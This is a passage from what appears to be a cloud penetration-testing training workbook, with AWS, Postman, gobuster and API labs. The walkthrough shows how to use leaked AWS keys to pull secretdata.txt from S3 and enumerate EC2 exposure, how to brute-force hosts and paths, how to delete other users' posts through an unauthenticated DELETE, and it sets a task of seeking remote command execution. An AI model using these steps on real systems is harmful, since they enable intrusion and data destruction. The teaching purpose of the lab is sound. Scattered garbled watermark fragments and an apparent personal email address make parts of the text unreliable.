In this lab we have:

1. Surface reviewed the contents of our exposed systems
2. Viewed the A/B comparison between hostname and IP scanning of these systems

We can now continue to review this environment and assess it for any weaknesses that we may encounter.

Why This Lab Is Important

This lab is important because reconnaissance, asset discovery, and surface area enumeration are critical components at the beginning of understanding how to assess an environment or how to properly defend it. We feel that tools like this provide a great advantage to both red and blue teams.

Lab 2.1 HTTP and Postman Tour

Brief Intro

This lab walks you through using Postman and cURL. It serves as both a tour of Postman and a way to get familiar with cURL. These tools will serve you well as both attackers and defenders, as they provide you with an interface into an API.

Requirements for This Lab

This lab does not require that Section 1 be done; however, it would be beneficial to have those URLs available. It will also require two command line tools:

Postman and cURL

These two should be available on your VM.

Try It Yourself

This lab will demonstrate how to use Postman and the cURL tool for testing both APIs and web applications.

1. Use your browser to look at the functionality of httpbin.org
2. Attempt a request to /patch in cURL with an accept header of application/json
3. Simulate the same request with Postman
4. Create a temporary environment in Postman
5. Use variable expansion to expand the method
6. Create variables for usernames and passwords
7. Create a request to /basic-auth with the username and password variables
8. Once this is validated, get the cURL equivalent command and attempt it.

Walkthrough

Simulating Swagger API using Postman

Let's open the MATE terminal so that we can launch Postman

Once the terminal is open, type the following commands:

$ cd /opt/postman

Start Postman as follows:

$ ./Postman

There is an icon on the desktop as well, either one will take a few minutes to open.

Once Postman is open you will be presented with the Postman UI.

The UI can be maximized to make use of the screen real estate. Let's now create a new request. Do not click on the New button; instead click on the + to open a new tab next to the Launchpad tab.

Now we will focus on creating a request that we can work with. To get familiar with the tool, let's visit httpbin.org.

Open Firefox from your taskbar and go to the following URL:

http://httpbin.org/

This website is a page with functionality to help you understand how APIs tend to work. It exists for you to learn with, so there are many options to play with. The site is documented with Swagger (OpenAPI), a popular API description standard with its own published schema, and the page you see is generated from that description.

Click the HTTP Methods button on the page to open the list of Swagger API calls that are supported.

We see that a large number of methods are supported with this set of calls. Each method, DELETE, GET, PATCH and POST in this example, is hosted at the path with the same name: you call DELETE on the /delete route, GET on the /get route, and so on.

Let us now configure Postman to play with some of these; let's open PATCH.

First click on the PATCH area to open the Swagger panel that lets you perform the action yourself.

One of the items to focus on is that this request, when executed, will be sent with an accept header of application/json, not the text/html a browser would normally ask for. Clicking the word Execute will execute the request from the browser.

The Execute button will only show up after you click 'Try it out'.

Look at the output; we see a few items. First, the cURL equivalent to execute the command; second, the JSON output of the command. How can we replicate this in Postman?

If you wish to make a note of the cURL command you can; this guide will replicate the command for you. It is:

curl -X PATCH "http://httpbin.org/patch" -H "accept: application/json"

Emulating the request in Postman

Open Postman and in the request window switch the method from GET to PATCH, and in the URL put http://httpbin.org/patch . Hit the Send button to get a response.

We can inspect the response in the response body. You can see the origin and some of the other output in its format. Let's now play around with environments. In the upper right hand corner click the eyeball.

Click the Add button; if you have an existing environment the button will say Edit. Name the environment Lab 2.1 Temporary.

Under Variable put in the word method; for the Initial Value enter patch, and for the Current Value enter patch.

Click Update, then hit Add and do this all over again: there is a bug in this version of the user interface.

Once you see Lab 2.1 Temporary in the list of environments, hit the X in the corner of this area to close it.

Select the dropdown in the environment area to choose Lab 2.1 Temporary as the environment.

In the URL of the request remove the word patch and replace it with {{method}}, as shown in the screenshot below.

We have now created a variable that we can change over time. Let's now make this API do some additional things. One of the common items we may have to deal with is authorization. The httpbin.org website does allow us to attempt basic authentication, so let's set up basic authentication with Postman.

Let's first set up our environment for reusability. Click back into the environment window using the eyeball, and click 'Edit'. Change the method variable's current value from patch to get, then add two new variables:

Key: username, Initial and Current Value: sec588

Key: password, Initial and Current Value: password

Now let's modify our request. Change the URL to:

http://httpbin.org/basic-auth/{{username}}/{{password}}

Next change the method to GET. Finally, on the Authorization tab, set the type to Basic Auth and set the username to {{username}} and the password to {{password}}.

Now let's take a look at the Postman code export by clicking on the 'Code' button on the screen, as highlighted:

This will present you with a menu that has a dropdown for different languages. Find the 'cURL' one, as shown below.

Copy the cURL command. Once it is copied, open a MATE terminal and paste the command in.

You can see that this now executes correctly.
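
For readers who want to see what Postman is doing underneath, here are the steps of this lab as an added Python example (not code from the workbook, Postman or httpbin): {{variable}} expansion from an environment, construction of the Basic auth header, the check that httpbin's /basic-auth/{user}/{passwd} route performs, and a cURL equivalent like the one the Code button produces. It runs offline. The environment values are the ones set above; the emulated httpbin route is an assumption about its behaviour (it answers 200 with an authenticated JSON body when the header credentials match the ones in the URL and 401 otherwise), and the curl string is built by hand rather than copied from Postman's exporter.

```python
"""Added example, not from the workbook, Postman or httpbin: the pieces of
Lab 2.1 in plain Python. Expands {{variables}}, builds and checks the Basic
auth header the way httpbin's /basic-auth route does, and prints the curl
equivalent. Everything here runs offline."""
import base64
import re
import shlex

VAR = re.compile(r"\{\{(\w+)\}\}")


def expand(template, env):
    """Postman-style variable expansion. An unset variable is an error rather
    than a literal '{{name}}' silently sent to the server."""
    def lookup(m):
        name = m.group(1)
        if name not in env:
            raise ValueError(f"unset variable {{{{{name}}}}}")
        return str(env[name])
    return VAR.sub(lookup, template)


def basic_auth_header(user, password):
    """RFC 7617: 'Basic ' + base64(user:password). This is encoding, not
    encryption: anyone who sees the header has the password, so only ever
    send it over TLS."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic_auth(header):
    """Inverse of basic_auth_header; None for anything that is not Basic."""
    scheme, _, token = (header or "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        user, _, password = base64.b64decode(token).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    return user, password


def build_request(method, url_template, env, basic_auth=False):
    """What Postman sends after expansion, as a plain dict."""
    headers = {"accept": "application/json"}
    if basic_auth:
        headers["Authorization"] = basic_auth_header(env["username"], env["password"])
    return {"method": expand(method, env).upper(),
            "url": expand(url_template, env), "headers": headers}


def to_curl(req):
    """A curl command line equivalent to the request (hand-rolled; the
    exact text Postman's Code button emits differs in flag spelling)."""
    parts = ["curl", "-X", req["method"], shlex.quote(req["url"])]
    for name, value in req["headers"].items():
        parts += ["-H", shlex.quote(f"{name}: {value}")]
    return " ".join(parts)


def httpbin_basic_auth(path, auth_header):
    """Emulates GET /basic-auth/{user}/{passwd}: the credentials in the URL
    are what the header must match. Returns (status, json body)."""
    m = re.fullmatch(r"/basic-auth/([^/]+)/([^/]+)", path)
    if not m:
        return 404, {}
    creds = decode_basic_auth(auth_header)
    if creds == (m.group(1), m.group(2)):
        return 200, {"authenticated": True, "user": creds[0]}
    return 401, {}


if __name__ == "__main__":
    env = {"method": "get", "username": "sec588", "password": "password"}
    req = build_request("{{method}}", "http://httpbin.org/basic-auth/{{username}}/{{password}}",
                        env, basic_auth=True)
    print(to_curl(req))
    path = req["url"].split("httpbin.org", 1)[1]
    print(httpbin_basic_auth(path, req["headers"]["Authorization"]))
```

Running decode_basic_auth on the header you just pasted into the terminal shows the lab's security lesson in one line: the "secret" in a Basic Authorization header is the password in base64, recoverable by anything on the path that can read the request.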


Replay of this lab

Why This Lab Is Important

We will be using Postman to simulate requests to APIs throughout our labs, so learning how Postman works will be critical to being able to build and automate attacks. Developer tools often turn out to be very powerful attack tools, and we need to embrace them, as they may be available long before a purpose-built attack tool wrapper is.

Additional Resources

SANS SEC642: Advanced Web Application Penetration Testing (https://www.sans.org/sec642)

Lab 2.2 Using the AWS CLI and Enumerating Users

Brief Intro

We are currently in our Mapping section, where we are looking at how to be more efficient when we map out networks, applications, and services.

Throughout this course you will be interacting with many of the Amazon Web Services APIs. The simplest way to facilitate access to the AWS API, outside of a tool that may constrain some of the API while automating other parts, is to be familiar with the API itself. The easiest way to become intimately familiar with it is to use the AWS CLI tool. In this lab we will start to work with the tool, including configuring a key by hand, working with filters and queries, and iterating through sets of data.

We potentially discovered an AWS key string in the Lab 1.4 exercise on Day 1. Let's see if we can actually use those keys to our advantage. Perhaps these keys have elevated privileges, or perhaps they can help us get further into the environment.

Requirements for This Lab

This lab would require you to have completed all of the Day 1 exercises; however, we will be reviewing many of the topics in the prerequisite sections. This lab does require connectivity to our AWS environment.

It will also require that the AWS tools are installed in our VM. You can check this by typing the following command in the CLI and looking for the aws help message:

$ aws

Try It Yourself

In the previous day, in Lab 1.4, we found what appeared to be Amazon Web Services API keys. In this lab we will be looking at those API keys.

1. Configure a profile using the keys with the name lab22
2. List out all of the contents within the s3 bucket pictures.<class-subdomain>.sec588.net
3. Try and see if you have permissions to read all s3 buckets
4. See what username you are logged in as
5. Try and get all the public IP addresses from the EC2 instances that are currently in production
6. Match the IP addresses to their respective security groups to be able to see what types of ports are allowed in

Walkthrough

Configuration of AWS Profiles

Let's open a MATE terminal to configure the appropriate profile in AWS.

In the CLI we are going to configure a profile called lab22:

$ aws configure --profile lab22

Let's fill in the information with what has been presented to us. In Lab 1.4 we found API keys in a git commit of a .env file. Let's open that file and answer the questions in configure:

The value of AWS= will be the answer to the first question (AWS Access Key ID)

The value of AWS_KEY= will be the answer to the second question (AWS Secret Access Key)

The region can be set to: us-east-1

We have provided an example screenshot below:

Let's test to see what permissions we have. First, you can see what the tool supports by using the help commands:

$ aws help
$ aws s3 help

We have provided you some commands to try. We understand that we haven't provided you with a ton of context on the tool, and that will be coming in a minute, but let's play with the AWS CLI to understand the options.

THE FOLLOWING COMMAND WILL FAIL!

$ aws s3 ls

But why? We need to pass it the appropriate profile to use, and to highlight this critical feature we wanted to show what happens without it. Every command below passes --profile lab22; alternatively, export AWS_PROFILE=lab22 once in the shell and the CLI will use that profile by default.

$ aws s3 ls s3://pictures.<class-subdomain>.sec588.net --profile lab22

We are going to provide you an S3 URL that you can use to explore; specifically we will provide you with the images S3 bucket. You can also copy anything you wish out of this S3 bucket, any file in it. Specifically, let's take our raven picture and the secretdata.txt file:

$ aws s3 cp --profile lab22 s3://pictures.<class-subdomain>.sec588.net/raven.png /home/sec588/files/workdir/raven.png
$ aws s3 cp --profile lab22 s3://pictures.<class-subdomain>.sec588.net/secretdata.txt /home/sec588/files/workdir/secretdata.txt

If you wish to open this file, it's in the files/workdir directory.

The specific IAM access control entry we have is for s3:Get*, which allows us to fetch objects from buckets whose names we already know. We may also be able to perform additional S3 operations if the bucket policy is not restrictive. Now let's try and list all buckets:

$ aws s3 ls --profile lab22

This yields a permissions denied error: listing every bucket in the account is the ListBuckets call, which needs s3:ListAllMyBuckets, and s3:Get* does not grant it. Let's see what else we may be able to do. To see which user these keys belong to, you can use IAM:

$ aws iam get-user --profile lab22

You can see the user is the bob- user. We will try one more thing: let's play with enumerating all the public IP addresses, as we described in an earlier slide.

The field names after jq are case sensitive; ensure you have the proper casing!

$ aws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] | .PublicIpAddress'

While this command above provides the details of the IP addresses we need to do some work to get the security
au

group tied to those addresses. Let's play around with some of the commands to see what exactly happens when
<p

we try and iterate through these.


s
rri
Ha

The rst step is to play with the string interpolation feature of jq to be able to pull out the instance ID and the Ip
Address, these are both contained in the same place:
gg
re

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G

aws ec2 describe-instances --profile lab22 | jq '.Reservations[].Instances[] | "\(.InstanceId)


:
To

\(.PublicIpAddress)"'
d
n se
ce
Li

live You now see the


power of the tool as it outputs both Instance Id and Ip Address on the same line. Now we need to gure out each
Instances Security Group:

aws ec2 describe-instances --profile lab22 | jq '.Reservations[].Instances[] | "\(.InstanceId)


\(.PublicIpAddress) \(.NetworkInterfaces[].Groups[].GroupId)"'

Now we have a new problem: each security group's port list lives somewhere else, and there is no simple way to get it, as we need to invoke a different API call to gather this data. Below is an example of a way to print out each security group ID and the ports that belong to it for manual verification:

$ for SG in `aws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] | .NetworkInterfaces[] | .Groups[] | .GroupId' | tr -d '"'`; do echo $SG; done

This command prints the group IDs; let's append each one to a describe-security-groups call:

$ for SG in `aws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] | .NetworkInterfaces[] | .Groups[] | .GroupId' | tr -d '"'`; do echo $SG; aws ec2 describe-security-groups --profile lab22 --group-ids $SG | jq '.SecurityGroups[] | .IpPermissions[] | .ToPort'; echo "===="; done

Two caveats when reading that output: a group attached to several instances is looked up once per attachment (pipe the ID list through sort -u to avoid repeats), and .ToPort alone prints null for a rule with IpProtocol -1 (all traffic) and says nothing about the source, so pull .FromPort, .ToPort and .IpRanges[].CidrIp together when you need the full picture.
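
The instance to public IP to security group to open ports join, as an added Python example (not from the workbook and not AWS or jq code) over constructed describe-instances and describe-security-groups output in the same JSON shape the jq filters above read. Instance IDs, addresses and group IDs are made up. It covers what the one-liners skip: instances with no public address, rules with IpProtocol -1 (no ToPort at all), port ranges and the source CIDRs, and it collapses the repeated group IDs so that a single describe-security-groups call would do.

```python
"""Added example, not from the workbook and not AWS/jq code: the instance ->
public IP -> security group -> open ports join from Lab 2.2 in one pass over
constructed describe-instances / describe-security-groups output. Instance
IDs, addresses and group IDs are made up."""
import json

DESCRIBE_INSTANCES = json.loads("""
{"Reservations": [
  {"Instances": [
    {"InstanceId": "i-0aaa", "PublicIpAddress": "203.0.113.10",
     "NetworkInterfaces": [{"Groups": [{"GroupId": "sg-0a"}, {"GroupId": "sg-0b"}]}]},
    {"InstanceId": "i-0bbb",
     "NetworkInterfaces": [{"Groups": [{"GroupId": "sg-0c"}]}]}
  ]},
  {"Instances": [
    {"InstanceId": "i-0ccc", "PublicIpAddress": "203.0.113.11",
     "NetworkInterfaces": [{"Groups": [{"GroupId": "sg-0a"}]}]}
  ]}
]}
""")

DESCRIBE_SECURITY_GROUPS = json.loads("""
{"SecurityGroups": [
  {"GroupId": "sg-0a", "IpPermissions": [
    {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "IpRanges": [{"CidrIp": "10.0.0.0/8"}]},
    {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
  {"GroupId": "sg-0b", "IpPermissions": [
    {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}]},
  {"GroupId": "sg-0c", "IpPermissions": [
    {"IpProtocol": "tcp", "FromPort": 8080, "ToPort": 8090, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]}
]}
""")


def instances(desc):
    """(InstanceId, PublicIpAddress or None, {GroupId, ...}) per instance."""
    out = []
    for res in desc["Reservations"]:
        for inst in res["Instances"]:
            groups = {g["GroupId"]
                      for eni in inst.get("NetworkInterfaces", [])
                      for g in eni.get("Groups", [])}
            out.append((inst["InstanceId"], inst.get("PublicIpAddress"), groups))
    return out


def unique_group_ids(desc):
    """What the shell loop iterates over, minus the repeats."""
    ids = set()
    for _, _, groups in instances(desc):
        ids |= groups
    return sorted(ids)


def describe_rule(perm):
    """'tcp/22', 'tcp/8080-8090' or 'all traffic'; .ToPort alone would be
    null for the IpProtocol -1 case."""
    proto = perm["IpProtocol"]
    if proto == "-1":
        return "all traffic"
    lo, hi = perm.get("FromPort"), perm.get("ToPort")
    if lo is None:
        return proto
    return f"{proto}/{lo}" if lo == hi else f"{proto}/{lo}-{hi}"


def ingress_rules(desc_sgs):
    """GroupId -> [(rule string, [source CIDRs])]."""
    rules = {}
    for sg in desc_sgs["SecurityGroups"]:
        entries = []
        for perm in sg.get("IpPermissions", []):
            cidrs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
            cidrs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
            entries.append((describe_rule(perm), cidrs))
        rules[sg["GroupId"]] = entries
    return rules


def internet_exposed(desc_instances, desc_sgs):
    """public IP -> sorted rule strings open to anywhere (0.0.0.0/0 or ::/0).
    Instances with no public address are skipped: a wide-open group on a
    private-only host is not internet attack surface by itself."""
    rules = ingress_rules(desc_sgs)
    exposed = {}
    for _iid, ip, groups in instances(desc_instances):
        if ip is None:
            continue
        open_rules = set()
        for gid in groups:
            for rule, cidrs in rules.get(gid, []):
                if any(c in ("0.0.0.0/0", "::/0") for c in cidrs):
                    open_rules.add(f"{gid} {rule}")
        exposed[ip] = sorted(open_rules)
    return exposed


if __name__ == "__main__":
    print("groups to look up:", unique_group_ids(DESCRIBE_INSTANCES))
    for ip, rules in internet_exposed(DESCRIBE_INSTANCES, DESCRIBE_SECURITY_GROUPS).items():
        print(ip, ", ".join(rules) or "nothing open to the internet")
```

To run it against real output, replace the two constants with json.load() of the files written by aws ec2 describe-instances and aws ec2 describe-security-groups --group-ids followed by the IDs from unique_group_ids(); the describe-security-groups command accepts several IDs in one call.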

Replay of this lab

Why This Lab Is Important

Now that we understand what we can do with the AWS CLI, let's use the CLI toolkit's power to start exploring the infrastructure permissions of the system. AWS has a very powerful permissions model, but with its age it has many challenges to overcome:

1. It has some complexity issues in its power
2. It can be misconfigured
3. Exposed keys or tokens may let us get further into an environment

We will be using the foundations of this lab in a further exercise.

Additional Resources

SANS SEC540: Cloud Security and DevOps Automation (https://www.sans.org/sec540)

Lab 2.3: Wordlists to find Endpoints and Resources

Brief Intro

This lab introduces you to the usefulness of extremely large and relevant wordlists.

The wordlists used in this lab have been created using a specific set of queries against publicly available datasets at Google.

The author of this course has decided not to have the students RUN the commands; instead, the commands that were used to create the wordlists in this class are shown below. If you wish to do this after class you can, and you will need:

1. A Google Cloud account
2. About $20 - $25 to run the queries in BigQuery (the Google Cloud data warehouse that hosts the public datasets commonspeak2 queries)

./commonspeak2 --project sec588 --credentials ~/.config/gcloud/application_default_credentials.json routes --frameworks rails -l 100000 -o rails-routes.txt

./commonspeak2 --project sec588 --credentials ~/.config/gcloud/application_default_credentials.json subdomains

The wordlist outputs are all located in /home/sec588/files/wordlists

What does the first command do? It leverages a public set of data sets 43

During this lab you will find and uncover new applications, hosts and resources that will be used throughout the labs today. Similar to the first day, this will be a cloud-based treasure hunt. Your goal will be to find the applications that allow us to:

1. Post text
2. Post a comment to that text
3. Any additional resources that are related

The wordlists themselves are fairly lengthy and take a long time to scan with. Instead, we have already trimmed the wordlists for you, like so:

$ head -10000 subdomains.txt > subdomains-10k.txt
$ head -5000 rails-routes.txt > rails-routes-5k.txt

We will only be using the -5k.txt and -10k.txt wordlists.

Requirements for This Lab

In this lab we will be requiring connectivity to our lab environment.

Try It Yourself

To attempt this lab yourself you will need a few bits of information:

1. Find the blog site using /opt/gobuster
2. The gobuster command for finding the hosts will be dns; the wordlist for this is going to be the wordlist called subdomains-10k.txt in the directory files/wordlists
3. Find the hidden API URLs in the blog site using /opt/gobuster; you will need to use the dir option
4. The wordlist for this is rails-routes-5k.txt in the directory files/wordlists
5. The command line options that are needed are to set threads to 100 and to run the tool in quiet mode
6. Once you have located the blog, attempt to delete a post. You will not be able to; try to delete it by using hidden API functionality.

Walkthrough

Getting started

We are going to be using gobuster to work through our wordlist in a very quick and efficient way. Commonspeak2 wordlists can be in the 1M+ range, but working through a 1M+ wordlist would be a very time-consuming task. We will begin with our reduced wordlists.

We will start by opening a MATE terminal if one is not already open:

To begin let's take a quick tour of our first two wordlists:

$ cd /home/sec588/files/wordlists

If we list out the directory with ls we should see several files with their corresponding commonspeak2 category:

rails-routes, subdomains, and scm

Let's look at the differences between subdomains and rails-routes:

$ cat subdomains-10k.txt | less

To exit the less command use the letter q to quit.

What we see when we cat this out is a list, but a list of what? This happens to be a list of all of the 'common' subdomains that have been found, in order of likelihood, inside specific repositories such as Hacker News and Stack Overflow on the internet.

These subdomains are the basis of the entire set of potential hosts. What gobuster can do is start with a base domain like:

sec588.net

and prepend each subdomain:

www.sec588.net
blog.sec588.net

going through the wordlist looking for names that resolve. Gobuster is a rather 'dumb' tool, however. In dns mode it only checks whether a name resolves, so a wildcard DNS record makes every candidate look valid (gobuster checks for this at the start of a run and stops unless told to continue); in dir mode it judges by HTTP status code, so a site that answers 200 OK for every path will produce false positives. It can follow redirects, but the results still need a human, or a tool like EyeWitness, to look at them.

Now, let's look at the other wordlist:

$ cat rails-routes-5k.txt | less

3e1e3b497543e6c11ac8e4188959c93e

20
, 20
28
pauljones166@outlook_com

ly
Ju
>
om
_c
ok
This particular wordlist has a different feel. All of the words on here look like the ends of URIs. The reason for this is that this particular wordlist comes from GitHub entries. They are actually based on repositories for Ruby on Rails applications, in which the Rails routes file, routes.rb, is looked at. The particular interest in this file is URIs that have been removed from routes.rb, which could be done for many valid reasons. The hope was to:

1. Get a list of URIs to append to hosts.
2. Get a list of URIs that may have security issues that a developer may have needed to remove from public exposure.

Now that we have a baseline for a set of wordlists, let's play with them to discover good and known pages.

Discovering hosts through subdomains

Gobuster has a set of tools to discover three individual items:

dns, vhosts, and dir

These would roughly map to:

dns would use the subdomains file, and
dir could use our routes file.

Let's look at some of the options for gobuster by going into the gobuster subdirectory and running the executable:

$ cd /opt/gobuster
$ ./gobuster

You should see a help menu and some global options:

Let's explore a few of these. First we will be working with the gobuster dns options to find new hosts for us to attack:

We will be using a few command line switches to start:

-d : this will specify our domain name. For this lab it will be: <class-subdomain>.sec588.net

-w : we can use the wordlist setting to specify our wordlist.

The first command we will run will be the following:

$ /opt/gobuster/gobuster dns -d <class-subdomain>.sec588.net -w /home/sec588/files/wordlists/subdomains-10k.txt

You will see output similar to what's below:

We have found a few hosts that could be interesting:

www
blog
dev
wiki
railsapi

Let's explore some of these in more detail. Do any of them have interesting directories?
Subdomain and Directory enumeration

Gobuster has a directory brute forcing capability that is rather primitive but effective. Let's start with appending a rails route to the end of some of the hosts. We will start with blog as it is the first entry in our list:

$ cd /opt/gobuster
$ ./gobuster help dir

We see some options that could be useful:

-u : This will be our URL string, so for the blog.<class-subdomain>.sec588.net this will be our URL for our lab.

-a : This is the user-agent string that is sent. Our Slingshot build for SEC588 has a very specific UserAgent string in the environment variables. To see it type:

$ env | grep UA

and you will see that the $UA variable is set to Chrome 74.

-t : This is to up the number of threads, we will use 100.

-q : There will be many errors, this suppresses those errors.

Our command:

$ /opt/gobuster/gobuster dir -u blog.<class-subdomain>.sec588.net -w /home/sec588/files/wordlists/rails-routes-5k.txt -a $UA -q -t 100
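From the server side, a run like the one above leaves a distinctive trace: one client, many distinct paths, mostly 404s, within a few seconds. As an added example, not part of the workbook or the lab environment, the Python below parses constructed combined-format access-log lines and flags that pattern; the IPs, paths and user agents are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of nginx/Apache "combined" access-log lines (not from the
# lab environment): one client walking Rails-style paths and collecting 404s,
# one ordinary visitor who hits a single 404 (the favicon).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jul/2020:14:02:01 +0000] "GET /admin HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Chrome/74.0)"
203.0.113.7 - - [28/Jul/2020:14:02:01 +0000] "GET /users/sign_in HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Chrome/74.0)"
203.0.113.7 - - [28/Jul/2020:14:02:02 +0000] "GET /rails/info HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Chrome/74.0)"
203.0.113.7 - - [28/Jul/2020:14:02:02 +0000] "GET /sidekiq HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Chrome/74.0)"
203.0.113.7 - - [28/Jul/2020:14:02:03 +0000] "GET /api HTTP/1.1" 200 8812 "-" "Mozilla/5.0 (Chrome/74.0)"
203.0.113.7 - - [28/Jul/2020:14:02:03 +0000] "GET /posts/new HTTP/1.1" 200 2311 "-" "Mozilla/5.0 (Chrome/74.0)"
198.51.100.20 - - [28/Jul/2020:14:02:05 +0000] "GET / HTTP/1.1" 200 4021 "-" "Mozilla/5.0 (Firefox/78.0)"
198.51.100.20 - - [28/Jul/2020:14:02:09 +0000] "GET /posts/7 HTTP/1.1" 200 3110 "http://blog.example.test/" "Mozilla/5.0 (Firefox/78.0)"
198.51.100.20 - - [28/Jul/2020:14:02:15 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Firefox/78.0)"
"""

# Combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_brute_forcers(log_text, min_404s=4, window_seconds=60):
    """Return {ip: [distinct 404 paths]} for clients that produced at least
    `min_404s` 404 responses for distinct paths inside a sliding time window.
    Distinct paths matter: a browser retrying one missing asset is not a scan."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            per_ip[rec["ip"]].append((rec["ts"], rec["path"]))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # shrink the window from the left until it spans <= window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            paths = {p for _, p in events[start:end + 1]}
            if len(paths) >= min_404s:
                flagged[ip] = sorted(paths)
                break
    return flagged


if __name__ == "__main__":
    for ip, paths in find_brute_forcers(SAMPLE_LOG).items():
        print(f"{ip}: {len(paths)} distinct 404 paths in window -> {paths}")
```

The thresholds are deliberately parameters: a 60-second window with four distinct misses is tight enough to catch a wordlist run even with `-t 100`, while a single visitor's stray 404 stays below it.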

Exploring our blog site

Let's take a look at our blog site. If we open Firefox, navigate to:

blog.<class-subdomain>.sec588.net

This particular site appears to be able to Create a New Post.

As a user you can create a post. You should go ahead and enter one in. AS AN EXAMPLE, the author is using the following one:

Once this is created we can see more functionality, such as the blog post can have comments.

Notice however that every post URL has a number; in our EXAMPLE we are using:

/posts/7

Record your post's number because we will need this later, and we will use it for our lab in the next section.

Once you have created a comment you may notice that comments can be deleted:

We cannot delete a post, however, can we?

Looking at our URLs

Please Note that this API is a Development API and the functionality of the API is not yet fully enabled. Using the 'Execute' function of this API will not yield you any results.

Look above at the output of gobuster. You probably saw many different URLs potentially, but one in particular may have stood out:

/api

Let's take a look at /api closely. When you open it you may notice that it is a Swagger API:
The Swagger UI has two options that seem to be usable: one is the GET method, another is the DELETE method. This one may be one that we may want to explore.

The DELETE method takes one parameter, which is the {id} parameter. If you expand the DELETE area you will see how you can use this API. Click the Try it out button and you will be able to see how to use the function and even execute a real command.

This will DELETE your post, but it could also delete any posts on the system, so be kind to your neighbors.

Your author as an example will DELETE the {id} of 7; you may or may not have a different number.

Do not use the Execute command to execute the request, it will not work. Use the curl below!

Copy the curl command to your local computer and replace the {id} with your blog post id.

curl -X DELETE "http://blog.<class-subdomain>.sec588.net/api/v1/posts/{id}" -H "accept: */*"
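What made that DELETE work is that the published spec declares no security requirement on the operation. As an added example (not from the workbook or the lab application), the Python below reads a constructed OpenAPI document modelled on a Swagger page like the blog's and lists every state-changing operation that carries no security requirement, which is the review a developer should run before exposing /api. The paths, scheme name and account of which operations are protected are invented.

```python
import json

# Constructed OpenAPI 3 document standing in for the blog's Swagger spec (not the lab's own).
# Document-level "security": [] means "no auth by default"; an operation can override it.
SPEC = json.loads("""{
 "openapi": "3.0.0",
 "components": {"securitySchemes": {"bearer": {"type": "http", "scheme": "bearer"}}},
 "security": [],
 "paths": {
  "/api/v1/posts": {
    "get": {"summary": "List posts"},
    "post": {"summary": "Create post", "security": [{"bearer": []}]}
  },
  "/api/v1/posts/{id}": {
    "get": {"summary": "Show post"},
    "delete": {"summary": "Delete post"}
  },
  "/api/v1/comments/{id}": {
    "delete": {"summary": "Delete comment", "security": [{"bearer": []}]}
  }
 }
}""")

# HTTP methods that change server state; a GET without auth may be a data leak
# but is a different class of finding, so it is reported separately.
MUTATING = {"post", "put", "patch", "delete"}


def operation_is_protected(spec, op):
    """An operation is protected if its own `security` list, or failing that the
    document-level default, names at least one scheme. An empty list means no auth."""
    sec = op.get("security", spec.get("security", []))
    return len(sec) > 0


def unauthenticated_operations(spec):
    """Return sorted (METHOD, path) pairs for every operation with no security requirement."""
    found = []
    for path, ops in spec.get("paths", {}).items():
        for method, op in ops.items():
            if method.lower() in {"get", "head", "options", *MUTATING} and not operation_is_protected(spec, op):
                found.append((method.upper(), path))
    return sorted(found)


def unauthenticated_mutations(spec):
    """The subset that actually changes data: these are the ones to fix first."""
    return [(m, p) for m, p in unauthenticated_operations(spec) if m.lower() in MUTATING]


if __name__ == "__main__":
    for method, path in unauthenticated_mutations(SPEC):
        print(f"{method} {path} is reachable without any security requirement")
```

The fix on the application side is the same regardless of framework: the destroy action needs both authentication and an ownership (or role) check, and the spec should then declare that requirement so the Swagger page stops advertising an anonymous DELETE.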

Conclusion

In this lab we covered how to use a large wordlist to comb through an environment and uncovered not just potentially hidden and not necessarily known servers, but also hidden endpoints and potentially hidden functionality. We looked at how the functionality of one system could be changed by just uncovering an API section.

In the wild we may find that the full functionality and security of a system is bypassed by using hidden APIs, hidden administrative consoles, or just by attempting to access sections of an application that are not meant to be accessed.

Why This Lab Is Important

All too often we see websites that have multiple avenues for testing but are missed. As penetration testers we should be looking for all of the avenues that we may find on a system, whether they are fully documented or not. It just so happens that /api was a fully documented API, but not every single one will be. Don't be afraid to try multiple methods and multiple ways to attempt to find more undocumented APIs.

Bonus (If Time Permits or Homework)

There is a hidden Ruby console that is available on the system. See if you can trigger the console by finding a broken page or creating some kind of error on the system. If you find the console, see if you can execute Ruby scripts or even commands on the host.

Additional Resources

SANS SEC642: Advanced Web Application Penetration Testing (https://www.sans.org/sec642)

Lab 2.4: Privilege Escalations through IAM - Part 1

Brief Intro

